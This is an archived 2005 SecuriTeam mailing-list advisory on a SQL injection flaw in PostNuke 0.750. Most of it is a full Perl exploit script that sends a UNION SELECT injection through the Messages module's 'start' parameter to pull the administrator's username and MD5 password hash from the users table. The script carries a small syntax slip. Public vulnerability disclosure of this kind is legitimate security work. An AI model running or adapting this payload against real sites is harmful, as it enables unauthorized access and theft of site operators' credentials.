[EXPL] PostNuke SQL Injection (start, Exploit)

• Previous message: SecuriTeam: "[UNIX] Solaris Runtime Linker Security Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 5 Jul 2005 14:00:35 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  PostNuke SQL Injection (start, Exploit)
------------------------------------------------------------------------

SUMMARY

" <http://www.postnuke.com/> PostNuke is one of the most powerful open
source content management systems in the world ..."

PostNuke is vulnerable to an SQL injection vulnerability, the following
exploit is able to retrieve administrator user/password with the help of
this SQL injection vulnerability.

DETAILS

Vulnerable Systems:
 * PostNuke version 0.750

Exploit:
#!/usr/bin/perl
# This tools is only for educational purpose
#
# K-C0d3r a x0n3-h4ck friend !!!
#
# This exploit should give admin nick and md5 password
#
#-=[ PostNuke SQL Injection version : x=> 0.750]=-
#-=[ ]=-
#-=[ Discovered by sp3x ]=-
#-=[ Coded by K-C0d3r ]=-
#-=[ irc.xoned.net #x0n3-h4ck to find me K-c0d3r[at]x0n3-h4ck.org]=-
#
# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
#
# !!! NOW IS PUBLIC (6-6-2005) !!!

use IO::Socket;

sub Usage {
print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com>
</path/to/modules.php>\n";
exit;
}

if (@ARGV < 2)
{
 Usage();
}

if (@ARGV > 2)
{
 Usage();
}

if (@ARGV == 2)
{
$host = @ARGV[0];
$path = @ARGV[1];

print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
print "[+] Connecting to $host\n";

$injection = "$host\/$path?";
$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
$injection .= "%20UNION%20SELECT%20pn_uname,null,".;
$injection .= "pn_uname,pn_pass,pn_pass,null,pn_pass,null";
$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=";
$injection .= "2\/*&total_messages=1";

$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;

print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:K-c0d3r[at]x0n3-h4ck.org>
K-C0d3r.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Solaris Runtime Linker Security Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]